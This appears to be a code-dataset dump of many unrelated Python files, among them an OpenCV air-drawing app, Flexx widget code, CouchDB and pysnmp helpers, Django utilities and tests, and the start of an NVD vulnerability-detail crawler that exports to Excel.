content stringlengths 5 1.05M |
|---|
from ._BoxBoundsCoercion import BoxBoundsCoercion
from ._Coercion import Coercion
from ._MaskBoundsCoercion import MaskBoundsCoercion
|
class TrainingState:
def __init__(self):
"""
A Structure containing states to be passed to callbacks
"""
# Will increment after each epochs
self.current_epoch = 0
# Will increment after each batch
self.current_batch = 0
# last execution was train or eval
self.training_mode = True
# The tensorboard logger
self.tensorboard_logger = None
# Average time to retrieve the next minibatch
self.average_data_loading_time = 0
# Average time to retrieve the next minibatch + process it
self.average_batch_processing_time = 0
self.training_data_size = 0
self.validation_data_size = 0
# Dictionary containing all average losses returned
# by the network on the validation
self.validation_average_losses = {}
# Dictionary containing all average losses returned
# by the network on the training (average on full epoch)
self.training_average_losses = {}
# Sum of average losses returned by the network on the validation
self.validation_average_loss = float('Inf')
# Sum of average losses returned by the network on the training
self.training_average_loss = float('Inf')
# Last prediction done by the network
self.last_prediction = None
# Last input given to the network
self.last_network_input = None
# Last target given to the network
self.last_target = None
# The network being optimized
self.model = None |
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - makecache script
@copyright: 2008 MoinMoin:ReimarBauer
@license: GNU GPL, see COPYING for details.
"""
from MoinMoin import caching
from MoinMoin.Page import Page
from MoinMoin.script import MoinScript
from MoinMoin.stats import hitcounts
class PluginScript(MoinScript):
"""\
Purpose:
========
This script allows you to create cache files in data/pages/PageName/cache/
and /data/cache directories
You will usually do this after changing MoinMoin code and calling "maint cleancache", by either upgrading
version, installing or removing macros.
text_html is the name of the cache file used for compiled pages formatted
by the wiki text to html formatter.
Detailed Instructions:
======================
General syntax: moin [options] maint makecache
[options] usually should be:
--config-dir=/path/to/my/cfg/ --wiki-url=http://wiki.example.org/
"""
def __init__(self, argv, def_values):
MoinScript.__init__(self, argv, def_values)
def mainloop(self):
self.init_request()
request = self.request
# make cache related to pagelinks entries of a page
pages = request.rootpage.getPageList(user='', exists=1)
for pagename in pages:
page = Page(request, pagename)
request.page = page
p = page.getPageLinks(request)
|
from typing import Dict, Optional
from asyncpg.exceptions import UniqueViolationError
from app.database.schema import User, UserToken
async def get_user(query: Dict) -> Optional[User]:
"""Gets user from database."""
user = await User.objects.get_or_none(**query)
return user
async def create_user(user) -> Optional[User]:
"""Create new user on database."""
try:
user = await User.objects.create(**user)
await UserToken.objects.create(user=user)
return user
except UniqueViolationError:
return None
|
#importing the libraries
import numpy as np
import cv2
from collections import deque
from color_selector import color_detector
import time
import os
#from record import last_frame
# calling the colour function
color_detector()
# color_arr()
bpoints = [deque(maxlen = 512)]
gpoints = [deque(maxlen = 512)]
ypoints = [deque(maxlen = 512)]
rpoints = [deque(maxlen = 512)]
# Now to mark the pointers in the above colour array we introduce some index values Which would mark their positions
blue_index = 0
green_index = 0
yellow_index = 0
red_index = 0
# The kernel is used for dilation of contour
kernel = np.ones((5, 5))
# The ink colours for the drawing purpose
colors = [(255, 0, 0), (0, 255, 0), (0, 225, 255), (0, 0, 255)]
colorIndex = 0
# Setting up the drawing board AKA The canvas
paintWindow = np.zeros((471, 636, 3)) + 255
cv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)
# loading the installed/attached camera of the device
cap = cv2.VideoCapture(0)
def recognize():
img = cv.imread('digits.png')
gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)
# Now we split the image to 5000 cells, each 20x20 size
cells = [np.hsplit(row,100) for row in np.vsplit(gray,50)]
# Make it into a Numpy array: its size will be (50,100,20,20)
x = np.array(cells)
# Now we prepare the training data and test data
train = x[:,:50].reshape(-1,400).astype(np.float32) # Size = (2500,400)
test = x[:,50:100].reshape(-1,400).astype(np.float32) # Size = (2500,400)
# Create labels for train and test data
k = np.arange(10)
train_labels = np.repeat(k,250)[:,np.newaxis]
test_labels = train_labels.copy()
# Initiate kNN, train it on the training data, then test it with the test data with k=1
knn = cv.ml.KNearest_create()
knn.train(train, cv.ml.ROW_SAMPLE, train_labels)
ret,result,neighbours,dist = knn.findNearest(test,k=5)
# Now we check the accuracy of classification
# For that, compare the result with test_labels and check which are wrong
matches = result==test_labels
correct = np.count_nonzero(matches)
accuracy = correct*100.0/result.size
print( accuracy )
while True:
# Reading the camera frame
ret, frame = cap.read()
# For saving
# out = cv2.VideoWriter("Paint-Window.mp4", cv2.VideoWriter_fourcc(*'XVID'), 1, (frame.shape[1], frame.shape[0]))
# Flipping the frame to see same side of the user
frame = cv2.flip(frame, 1)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# Getting the new positions of the trackbar and setting the new HSV values
u_hue = cv2.getTrackbarPos("Upper Hue", "Color detectors")
u_saturation = cv2.getTrackbarPos("Upper Saturation", "Color detectors")
u_value = cv2.getTrackbarPos("Upper Value","Color detectors")
l_hue = cv2.getTrackbarPos("Lower Hue", "Color detectors")
l_saturation = cv2.getTrackbarPos("Lower Saturation", "Color detectors")
l_value = cv2.getTrackbarPos("Lower Value", "Color detectors")
Upper_hsv = np.array([u_hue, u_saturation, u_value])
Lower_hsv = np.array([l_hue, l_saturation, l_value])
# Adding the colour buttons to the live frame to choose color
frame = cv2.rectangle(frame, (35, 1), (135, 65), (122, 122, 122), -1)
frame = cv2.rectangle(frame, (160, 1), (255, 65), (255, 0, 0), -1)
frame = cv2.rectangle(frame, (275, 1), (370, 65), (0, 255, 0), -1)
frame = cv2.rectangle(frame, (390, 1), (485, 65), (0, 255, 255), -1)
frame = cv2.rectangle(frame, (505, 1), (600, 65), (0, 0, 255), -1)
cv2.putText(frame, "Clear All", (55, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
cv2.putText(frame, "Blue Color", (175, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
cv2.putText(frame, "Green Color", (285, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
cv2.putText(frame, "Yellow Color", (400, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (150, 150, 150), 2, cv2.LINE_AA)
cv2.putText(frame, "Red Color", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
# masking out the pointer for it's identification in the frame
Mask = cv2.inRange(hsv, Lower_hsv, Upper_hsv)
Mask = cv2.erode(Mask, kernel, iterations = 1)
Mask = cv2.morphologyEx(Mask, cv2.MORPH_OPEN, kernel)
Mask = cv2.dilate(Mask, kernel, iterations = 1)
# Now contouring the pointers post identification
countours, _ = cv2.findContours(Mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
centre = None
# If there are any contours formed
if len(countours) > 0:
# sorting the contours for the biggest
countour = sorted(countours, key = cv2.contourArea, reverse = True)[0]
# Get the radius of the cirlce formed around the found contour
((x, y), radius) = cv2.minEnclosingCircle(countour)
# Drawing the circle boundary around the contour
cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)
# Calculating the centre of the detected contour
M = cv2.moments(countour)
centre = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
# Now checking if the user clicked on another button on the screen (the 4 buttons that were mentioned Y,G,B,R and clear all)
if centre[1] <= 65:
# Clear Button
if 35 <= centre[0] <= 135:
bpoints = [deque(maxlen = 512)]
gpoints = [deque(maxlen = 512)]
ypoints = [deque(maxlen = 512)]
rpoints = [deque(maxlen = 512)]
blue_index = 0
green_index = 0
yellow_index = 0
red_index = 0
paintWindow[67:, :, :] = 255
elif 160 <= centre[0] and centre[0] <= 255:
colorIndex = 0 # Blue
elif 275 <= centre[0] and centre[0] <= 370:
colorIndex = 1 # Green
elif 390 <= centre[0] and centre[0] <= 485:
colorIndex = 2 # Yellow
elif 505 <= centre[0] and centre[0] <= 600:
colorIndex = 3 # Red
else :
if colorIndex == 0:
bpoints[blue_index].appendleft(centre)
elif colorIndex == 1:
gpoints[green_index].appendleft(centre)
elif colorIndex == 2:
ypoints[yellow_index].appendleft(centre)
elif colorIndex == 3:
rpoints[red_index].appendleft(centre)
# Appending the next deques if nothing is detected
else:
bpoints.append(deque(maxlen = 512))
blue_index += 1
gpoints.append(deque(maxlen = 512))
green_index += 1
ypoints.append(deque(maxlen = 512))
yellow_index += 1
rpoints.append(deque(maxlen = 512))
red_index += 1
# Drawing the lines of every colour on the canvas and the track frame window
points = [bpoints, gpoints, ypoints, rpoints]
for i in range(len(points)):
for j in range(len(points[i])):
for k in range(1, len(points[i][j])):
if points[i][j][k - 1] is None or points[i][j][k] is None:
continue
cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 25)
cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 25)
key = cv2.waitKey(1)
if key & 0xFF == ord('f'):
cv2.imwrite("last_frame.jpg", paintWindow)
# Displaying/running all the 3 windows
cv2.imshow("Live Tracking", frame)
cv2.imshow("Paint", paintWindow)
cv2.imshow("mask", Mask)
# For quitting/breaking the loop - press and hold ctrl+q twice
if cv2.waitKey(1) & 0xFF == ord("q"):
break
# out.write(frame)
# last_frame()
# out.release()
# Releasing the camera and all the other resources of the device
cap.release()
cv2.destroyAllWindows() |
"""
.. UIExample:: 100
from flexx import app, ui
# A red widget
class Example(ui.Widget):
CSS = ".flx-example {background:#f00; min-width: 20px; min-height:20px}"
"""
import json
import threading
from .. import react
from ..app import Pair, get_instance_by_id
from ..app.serialize import serializer
def _check_two_scalars(name, v):
if not (isinstance(v, (list, tuple)) and
isinstance(v[0], (int, float)) and
isinstance(v[1], (int, float))):
raise ValueError('%s must be a tuple of two scalars.' % name)
return float(v[0]), float(v[1])
# Keep track of stack of default parents when using widgets
# as context managers. Have one list for each thread.
_default_parents_per_thread = {} # dict of threadid -> list
def _get_default_parents():
""" Get list that represents the stack of default parents.
Each thread has its own stack.
"""
# Get thread id
if hasattr(threading, 'current_thread'):
tid = id(threading.current_thread())
else:
tid = id(threading.currentThread())
# Get list of parents for this thread
return _default_parents_per_thread.setdefault(tid, [])
class Widget(Pair):
""" Base widget class.
In HTML-speak, this represents a plain div-element. Not very useful
on itself, except perhaps to fill up space. Subclass to create
something interesting.
When *subclassing* a Widget to create a compound widget (a widget
that serves as a container for other widgets), use the ``init()``
method to initialize child widgets. This method is called while
the widget is the current widget.
When subclassing to create a custom widget use the ``_init()``
method both for the Python and JS version of the class.
"""
def __init__(self, **kwargs):
# todo: -> parent is widget or ref to div element
parent = kwargs.pop('parent', None)
# Apply default parent?
if parent is None:
default_parents = _get_default_parents()
if default_parents:
parent = default_parents[-1]
# Use parent proxy unless proxy was given
if parent is not None and not kwargs.get('_proxy', None):
kwargs['proxy'] = parent.proxy
# Provide css class name to JS
classes = ['flx-' + c.__name__.lower() for c in self.__class__.mro()]
classname = ' '.join(classes[:1-len(Widget.mro())])
# Pass properties via kwargs
kwargs['_css_class_name'] = classname
kwargs['parent'] = parent
Pair.__init__(self, **kwargs)
with self:
self.init()
# Signal dependencies may have been added during init(), also in JS
self.connect_signals(False)
cmd = 'flexx.instances.%s.connect_signals(false);' % self._id
self._proxy._exec(cmd)
def _repr_html_(self):
""" This is to get the widget shown inline in the notebook.
"""
if self.container_id():
return "<i>This widget is already shown in this notebook</i>"
container_id = self.id + '_container'
def set_cointainer_id():
self.container_id._set(container_id)
# Set container id, this gets applied in the next event loop
# iteration, so by the time it gets called in JS, the div that
# we define below will have been created.
from ..app import call_later
call_later(0.1, set_cointainer_id) # todo: always do calls in next iter
return "<div class='flx-container' id=%s />" % container_id
def init(self):
""" Overload this to initialize a cusom widget. Inside, this
widget is the current parent.
"""
pass
def disconnect_signals(self, *args):
""" Overloaded version of disconnect_signals() that will also
disconnect the signals of any child widgets.
"""
children = self.children()
Pair.disconnect_signals(self, *args)
for child in children:
child.disconnect_signals(*args)
def __enter__(self):
# Note that __exit__ is guaranteed to be called, so there is
# no need to use weak refs for items stored in default_parents
default_parents = _get_default_parents()
default_parents.append(self)
return self
def __exit__(self, type, value, traceback):
default_parents = _get_default_parents()
assert self is default_parents.pop(-1)
#if value is None:
# self.update()
@react.source
def container_id(v=''):
""" The id of the DOM element that contains this widget if
parent is None.
"""
return str(v)
@react.input
def parent(v=None):
""" The parent widget, or None if it has no parent.
"""
if v is None or isinstance(v, Widget):
return v
else:
raise ValueError('parent must be a widget or None')
# Note that both the Py and JS have their own children signal
# todo: prevent unnecesary updates
@react.source
def children(v=()):
""" The child widgets of this widget.
"""
assert all([isinstance(w, Widget) for w in v])
return tuple(v)
@react.input
def flex(v=0):
""" How much space this widget takes when contained in a layout.
A flex of 0 means to take the minimum size.
"""
return float(v)
@react.input
def pos(v=(0, 0)):
""" The position of the widget when it in a ayout that allows
positioning.
"""
return _check_two_scalars('pos', v)
@react.input
def size(v=(0, 0)):
""" The size of the widget when it in a layout that allows
positioning.
"""
return _check_two_scalars('size', v)
@react.input
def min_size(v=(0, 0)):
""" The minimum size of the widget.
"""
return _check_two_scalars('min_size', v)
@react.input
def bgcolor(v=''):
""" Background color of the widget. In general it is better to do
styling via CSS.
"""
return str(v)
# todo: can we calculate this in JS somehow?
@react.input
def _css_class_name(self, v=''):
v = str(v)
if getattr(self, '_IS_APP', False): # set when a widget is made into an app
v = 'flx-main-widget ' + v
return v
@react.connect('parent')
def _parent_changed_py(self, new_parent):
old_parent = self.parent.last_value
if old_parent is not None:
children = list(old_parent.children()[:])
while self in children:
children.remove(self)
old_parent.children._set(children)
if new_parent is not None:
children = list(new_parent.children()[:])
children.append(self)
new_parent.children._set(children)
CSS = """
.flx-container {
min-height: 10px; /* splitter sets its own minsize if contained */
}
.flx-widget {
box-sizing: border-box;
white-space: nowrap;
overflow: hidden;
}
.flx-main-widget {
width: 100%;
height: 100%;
}
"""
class JS:
def _init(self):
self._create_node()
flexx.get('body').appendChild(this.node)
# todo: allow setting a placeholder DOM element, or any widget parent
# Create closure to check for size changes
self._stored_size = 0, 0
self._checking_size = False
that = this
def _check_resize():
# Re-raise in next event loop iteration
if not that._checking_size:
setTimeout(_check_resize_now, 0.001)
that._checking_size = True
def _check_resize_now():
that._checking_size = False
node = that.node
widthChanged = (that._stored_size[0] != node.offsetWidth)
heightChanged = (that._stored_size[1] != node.offsetHeight)
if widthChanged or heightChanged:
that.actual_size._set([node.offsetWidth, node.offsetHeight])
self._check_resize = _check_resize
self._check_resize()
super()._init()
# @react.source
# def children(v=()):
# """ The child widgets of this widget.
# """
# for w in v:
# if not isinstance(w, flexx.classes.Widget):
# raise ValueError('Children should be Widget objects.')
# return v
@react.source
def actual_size(v=(0, 0)):
""" The real (actual) size of the widget.
"""
return v[0], v[1]
def _create_node(self):
this.node = document.createElement('div')
@react.connect('_css_class_name')
def _css_class_name_changed(self, v):
this.node.className = v
def _add_child(self, widget):
""" Add the DOM element. Called right after the child widget is added. """
# May be overloaded in layout widgets
self.node.appendChild(widget.node)
def _remove_child(self, widget):
""" Remove the DOM element. Called right after the child widget is removed. """
self.node.removeChild(widget.node)
@react.connect('parent')
def _parent_changed(self, new_parent):
old_parent = self.parent.last_value
if old_parent is not None and old_parent is not undefined:
children = old_parent.children()[:]
while self in children:
children.remove(self)
old_parent.children._set(children) # we set it directly
old_parent._remove_child(self)
if new_parent is not None:
children = new_parent.children()[:]
children.append(self)
new_parent.children._set(children)
new_parent._add_child(self)
@react.connect('parent.actual_size')
def _keep_size_up_to_date1(self, size):
#print(self._id, 'resize 1', size)
self._check_resize()
@react.connect('parent', 'container_id')
def _keep_size_up_to_date2(self, parent, id):
#print(self._id, 'resize2 ', parent, id)
if parent is None:
window.addEventListener('resize', self._check_resize, False)
else:
window.removeEventListener('resize', self._check_resize, False)
self._check_resize()
@react.connect('pos')
def _pos_changed(self, pos):
self.node.style.left = pos[0] + "px" if (pos[0] > 1) else pos[0] * 100 + "%"
self.node.style.top = pos[1] + "px" if (pos[1] > 1) else pos[1] * 100 + "%"
@react.connect('size')
def _size_changed(self, size):
size = size[:]
for i in range(2):
if size[i] == 0 or size is None or size is undefined:
size[i] = '' # Use size defined by CSS
elif size[i] > 1:
size[i] = size[i] + 'px'
else:
size[i] = size[i] * 100 + 'px'
self.node.style.width = size[0]
self.node.style.height = size[1]
@react.connect('bgcolor')
def _bgcolor_changed(self, color):
self.node.style['background-color'] = color
@react.connect('container_id')
def _container_id_changed(self, id):
#if self._parent:
# return
if id:
el = document.getElementById(id)
el.appendChild(this.node)
## Children and parent
# @property
# def children(self):
# return self._children
#
# def _add_child(self, widget):
# pass # special hook to introduce a child inside this widget
#
# def _remove_child(self, widget):
# pass # special hook to remove a child out from this widget
#
#
# @react.connect('parent')
# def _parent_changed(self, new_parent):
# old_parent = self.parent.previous_value
# if old_parent is not None:
# children = list(old_parent.children())
# while self in children:
# children.remove(self)
# #old_parent._set_prop('children', children) # bypass readonly
# old_parent.children._set(children)
# old_parent._remove_child(self)
# if new_parent is not None:
# children = list(new_parent.children())
# children.append(self)
# #new_parent._set_prop('children', children)
# new_parent.children._set(children)
# new_parent._add_child(self)
|
from django.contrib import admin
from .models import Note
@admin.register(Note)
class NoteAdmin(admin.ModelAdmin):
pass |
from hyperlpr_py3 import pipline as pp
import hyperlpr_py3.config as hyperConfig
import cv2
import sys
import os
debugInfo = hyperConfig.configuration["global"]["debug"]
testPath = hyperConfig.configuration["detectTest"]["detectPath"]
outPath = hyperConfig.configuration["detectTest"]["outputPath"]
def detectPlateTest(filepath):
for filename in os.listdir(filepath):
if filename.endswith(".jpg") or filename.endswith(".JPG") or filename.endswith(".png"):
fileFullPath = os.path.join(filepath, filename)
image = cv2.imread(fileFullPath)
print(fileFullPath)
image_c = image.copy()
image_c, res = pp.SimpleRecognizePlateByE2E(image_c)
pathName = filename.split('.')[0]
if debugInfo:
if os.path.exists(os.path.join(outPath, pathName)) == False:
os.mkdir(os.path.join(outPath, pathName))
cv2.imwrite(os.path.join(outPath, pathName, "out_" + pathName + ".png"), image_c)
if __name__ == "__main__":
detectPlateTest(testPath)
|
'''
from pysnmp.hlapi import *
errorIndication, errorStatus, errorIndex, varBinds = next(
setCmd(SnmpEngine(),
CommunityData('public'),
UdpTransportTarget(('192.168.61.6', 161)),
ContextData(),
ObjectType(ObjectIdentity('LUXL-POE-MIB', 'luxlPoeConfigInterfaceParamMode', 1000001).addAsn1MibSource('file:///Users/michaelhelton/Downloads/LUXL_MIBs_ALL/LUXL-POE-MIB.mib'),2))
)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind]))
'''
from pysnmp.hlapi import *
from pysnmp.hlapi import UsmUserData
errorIndication, errorStatus, errorIndex, varBinds = next(
setCmd(SnmpEngine(),
UsmUserData('user',authKey='password'),
UdpTransportTarget(('192.168.61.6', 161)),
ContextData(),
ObjectType(ObjectIdentity('LUXL-POE-MIB', 'luxlPoeConfigInterfaceParamMode', 1000001).addAsn1MibSource('file:///Users/michaelhelton/Downloads/LUXL_MIBs_ALL/LUXL-POE-MIB.mib'),2))
)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind])) |
"""
Provide CouchDB utility functions.
"""
import os
import yaml
import couchdb
from cloudly.decorators import Memoized
import cloudly.logger as logger
from cloudly.aws import ec2
log = logger.init(__name__)
@Memoized
def get_server(hostname=None, port=None, username=None, password=None,
protocol=None):
"""Return a server instance.
The following heuristic is used to find the server:
- function arguments take precedence over all else,
- environment variable COUCHDB_HOST is used otherwise,
- use the service finder of cloudly.aws.ec2 to look up a couchdb
server if none was found so far,
- else use 127.0.0.1
"""
host = (
hostname or
os.environ.get("COUCHDB_HOST") or
ec2.get_hostname("couchdb") or
"127.0.0.1"
)
protocol = protocol or os.environ.get("COUCHDB_PROTOCOL", "http")
port = port or os.environ.get("COUCHDB_PORT",
443 if protocol == "https" else 5984)
username = username or os.environ.get("COUCHDB_USERNAME", None)
password = password or os.environ.get("COUCHDB_PASSWORD", None)
if username is not None and password is not None:
url = "{protocol}://{username}:{password}@{host}:{port}".format(
protocol=protocol,
host=host,
port=port,
username=username,
password=password,
)
log.info("{} port {}, authenticated".format(host, port))
else:
url = "{protocol}://{host}:{port}".format(
protocol=protocol,
host=host,
port=port,
)
log.info("{} port {}".format(host, port))
return couchdb.Server(url)
def get_or_create(server, database_name):
try:
database = server[database_name]
except couchdb.http.ResourceNotFound:
database = server.create(database_name)
return database
def sync_design_doc(database, design_filename):
"""Sync a design document written as a YAML file."""
with open(design_filename) as design_file:
design_doc = yaml.load(design_file)
# Delete old document, to avoid ResourceConflict exceptions.
old = database.get(design_doc['_id'])
if old:
database.delete(old)
database.save(design_doc)
def update_feed(database_name, include_docs=False):
"""Return a continuous feed of updates to the database.
The most recent changes are returned.
"""
db = get_server()[database_name]
since = db.info()['update_seq']
return db.changes(feed='continuous',
include_docs=include_docs,
since=since)
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010-2014 Joel Andersson, Joris Gillis, Moritz Diehl,
# K.U. Leuven. All rights reserved.
# Copyright (C) 2011-2014 Greg Horn
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
from casadi import *
from numpy import Inf
def reportBounds(value,lowerbound,upperbound,labels=None,tol=1e-8,showNonViolating=True):
if hasattr(labels,"labels"):
labels = labels.labels()
v = list(value.nonzeros())
lb = list(lowerbound.nonzeros())
ub = list(upperbound.nonzeros())
if labels is None:
labels = [""] * len(v)
if not(len(v)==len(lb) and len(lb)==len(ub)):
raise Exception("value, lowerbound and upperbound must all be the same size, but got %d, %d and %d. " % (len(v),len(lb),len(ub)))
if len(labels)!=len(v):
raise Exception("Labels (%d) must be same size as values (%d)" % (len(labels),len(v)))
if ( all(value <= upperbound + tol) and all(value >= lowerbound - tol) ):
print("All %d bounds are met: " % value.size())
else:
print("Problem with bounds : ")
print("-"*60)
# The length of the numeric fields
fieldlength = 10
# The length of the constraint visualizer strip
indicator_length = 15
# Loop over the elements of value
for i in range(value.size()):
violated = (v[i] > (ub[i] + tol) or v[i] < (lb[i] - tol))
nonregular = not is_regular([v[i]])
if not(showNonViolating) and not(violated) and not(nonregular):
continue
if labels is None:
identifier = "%d." % i
else:
identifier = labels[i]
if ( abs(lb[i] - ub[i])<=tol):
midfield = "%*s == %*s " % (fieldlength, "%.7e" % lb[i], fieldlength, "%.7e" % v[i])
indicator = ""
else:
indicator = "-" * indicator_length
if lb[i]==Inf:
indicator = "8" + indicator
elif (abs(v[i]-lb[i])<=tol):
indicator = "X" + indicator
else:
indicator = "o" + indicator
if ub[i]==Inf:
indicator += "8"
elif (abs(v[i]-ub[i])<=tol):
indicator += "X"
else:
indicator += "o"
if (v[i] <= (ub[i] + tol) and v[i] >= (lb[i] - tol)):
index = (v[i]-lb[i])/(ub[i]-lb[i])*(indicator_length-1)
index = min(max(0,index),indicator_length-1)
index = int(index)
indicator = indicator[:1+index] + '=' + indicator[1+index:]
midfield = "%*s <= %*s <= %*s" % (fieldlength, "%.7e" % lb[i], fieldlength, "%.7e" % v[i], fieldlength, "%.7e" % ub[i])
if (v[i] > (ub[i] + tol) or v[i] < (lb[i] - tol)):
indicator = " VIOLATED "
if nonregular:
indicator = " !REGULAR "
print("%15s | %*s | %*s" % (identifier, (fieldlength + 6) * 3 , midfield, indicator_length+3, indicator))
print("-" * 60)
|
# Generated by Django 2.0.4 on 2018-04-12 12:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('text', '0004_details_slug'),
]
operations = [
migrations.AddField(
model_name='details',
name='text_color',
field=models.CharField(choices=[('white', 'White'), ('black', 'Black'), ('e3827b', 'Red')], default='Black', max_length=30, verbose_name='text color'),
),
]
|
from unittest import mock
import pytest
from django.contrib.auth.models import User
from django.db import DEFAULT_DB_ALIAS
from django.test.utils import override_settings
from dj_anonymizer.utils import import_if_exist, truncate_table
@pytest.mark.parametrize('path, expected', [
('hello', False),
('base', True),
])
def test_import_if_exist(mocker, path, expected):
with override_settings(
ANONYMIZER_MODEL_DEFINITION_DIR='example/anonymizer'
):
mocked_import = mock.MagicMock()
mocker.patch('importlib.util.spec_from_file_location', mocked_import)
import_if_exist(path)
assert mocked_import.called is expected
@mock.patch('dj_anonymizer.utils.connections')
def test_truncate_table(mock_connections):
mock_cursor = mock_connections.\
__getitem__(DEFAULT_DB_ALIAS).\
cursor.return_value.__enter__.return_value
mock_connections.__getitem__(DEFAULT_DB_ALIAS).vendor = 'sqlite'
truncate_table(User)
mock_cursor.execute.assert_called_once_with('DELETE FROM "auth_user"')
mock_connections.__getitem__(DEFAULT_DB_ALIAS).vendor = 'dummy'
with pytest.raises(NotImplementedError):
truncate_table(User)
|
import autolens as al
def tracer_generator_from_aggregator(aggregator):
return aggregator.map(func=tracer_from_agg_obj)
def tracer_from_agg_obj(agg_obj):
output = agg_obj.output
phase_attributes = agg_obj.phase_attributes
most_likely_instance = output.most_likely_instance
galaxies = most_likely_instance.galaxies
if phase_attributes.hyper_galaxy_image_path_dict is not None:
for galaxy_path, galaxy in most_likely_instance.path_instance_tuples_for_class(
al.Galaxy
):
if galaxy_path in phase_attributes.hyper_galaxy_image_path_dict:
galaxy.hyper_model_image = phase_attributes.hyper_model_image
galaxy.hyper_galaxy_image = phase_attributes.hyper_galaxy_image_path_dict[
galaxy_path
]
return al.Tracer.from_galaxies(galaxies=galaxies)
def masked_imaging_generator_from_aggregator(aggregator):
return aggregator.map(func=masked_imaging_from_agg_obj)
def masked_imaging_from_agg_obj(agg_obj):
return al.MaskedImaging(
imaging=agg_obj.dataset,
mask=agg_obj.mask,
psf_shape_2d=agg_obj.meta_dataset.psf_shape_2d,
pixel_scale_interpolation_grid=agg_obj.meta_dataset.pixel_scale_interpolation_grid,
inversion_pixel_limit=agg_obj.meta_dataset.inversion_pixel_limit,
inversion_uses_border=agg_obj.meta_dataset.inversion_uses_border,
positions_threshold=agg_obj.meta_dataset.positions_threshold,
)
def fit_imaging_generator_from_aggregator(aggregator):
return aggregator.map(func=fit_imaging_from_agg_obj)
def fit_imaging_from_agg_obj(agg_obj):
masked_imaging = masked_imaging_from_agg_obj(agg_obj=agg_obj)
tracer = tracer_from_agg_obj(agg_obj=agg_obj)
return al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
|
# Author: 14281055 Liheng Chen CIT BJTU
# File Name: NVDVulnInfoCrawler.py
import re
import os
import bs4
import xlrd
import xlwt
from xlutils.copy import copy
import Repository
def write_workbook(vuln_detail_dict, save_path, row):
r_workbook = xlrd.open_workbook(save_path, formatting_info=True)
w_workbook = copy(r_workbook)
w_sheet = w_workbook.get_sheet(0)
keys = ['CVE Number', 'Current Description', 'Analysis Description', 'Vulnerability Type']
cvss_v3_keys = ['CVSS v3 Base Score', 'Vector', 'Impact Score', 'Exploitability Score']
cvss_v2_keys = ['CVSS v2 Base Score', 'Vector', 'Impact Subscore', 'Exploitability Subscore']
reference_keys = ['Hyperlink', 'Resource']
start_col = 0
for key in keys:
if key in vuln_detail_dict.keys():
w_sheet.write(row, start_col, vuln_detail_dict[key])
start_col += 1
if 'CVSS Severity V3' in vuln_detail_dict.keys():
cvss_v3_dict = vuln_detail_dict['CVSS Severity V3']
for key in cvss_v3_keys:
if key in cvss_v3_dict.keys():
w_sheet.write(row, start_col, cvss_v3_dict[key])
elif key is 'Impact Score' and 'Impact Subscore' in cvss_v3_dict.keys():
w_sheet.write(row, start_col, cvss_v3_dict['Impact Subscore'])
elif key is 'Exploitability Score' and 'Exploitability Subscore' in cvss_v3_dict.keys():
w_sheet.write(row, start_col, cvss_v3_dict['Exploitability Subscore'])
start_col += 1
if 'CVSS Severity V2' in vuln_detail_dict.keys():
cvss_v2_dict = vuln_detail_dict['CVSS Severity V2']
for key in cvss_v2_keys:
if key in cvss_v2_dict.keys():
w_sheet.write(row, start_col, cvss_v2_dict[key])
elif key is 'Impact Subscore' and 'Impact Score' in cvss_v2_dict.keys():
w_sheet.write(row, start_col, cvss_v2_dict['Impact Score'])
elif key is 'Exploitability Subscore' and 'Exploitability Score' in cvss_v2_dict.keys():
w_sheet.write(row, start_col, cvss_v2_dict['Exploitability Score'])
start_col += 1
if 'References' in vuln_detail_dict.keys():
reference_list = vuln_detail_dict['References']
count = 1
for reference in reference_list:
if 'Resource' in reference.keys() and re.match('.*patch', reference['Resource'], re.I):
color_index = 2
else:
color_index = 0
for key in reference_keys:
if key in reference.keys():
w_sheet.write(row, start_col, reference[key],
Repository.set_font(color_index=color_index))
start_col += 1
if count == 25:
break
count += 1
w_workbook.save(save_path)
def init_workbook(path):
# Judge path exists or not
if os.path.exists(path):
os.remove(path)
# Open workbook
w_workbook = xlwt.Workbook()
w_sheet = w_workbook.add_sheet('NVD Vuln Detail', cell_overwrite_ok=True)
# Table head
heads = ['CVE Number', 'Current Description', 'Analysis Description', 'Vulnerability Type']
cvss_head = ['Base Score', 'Vector', 'Impact Score', 'Exploitability Score']
reference_head = ['Hyperlink', 'Resource']
# Write Head
start_col = 0
